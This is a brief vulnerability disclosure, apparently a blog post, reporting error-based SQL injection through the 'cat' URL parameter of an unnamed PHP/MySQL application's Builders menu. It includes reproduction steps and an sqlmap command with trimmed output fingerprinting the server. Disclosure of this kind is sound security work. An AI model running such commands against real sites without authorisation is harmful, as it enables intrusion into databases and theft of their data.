Description
- It was found that the application suffers from error based SQL injection
SQL Injection
Steps to Reproduce:
- Navigate to "Builders" menu
- The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
- That is the injection point
- Automate process with SQLMap
sqlmap -r request.txt --dbms=mysql -p cat
[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]
No comments:
Post a Comment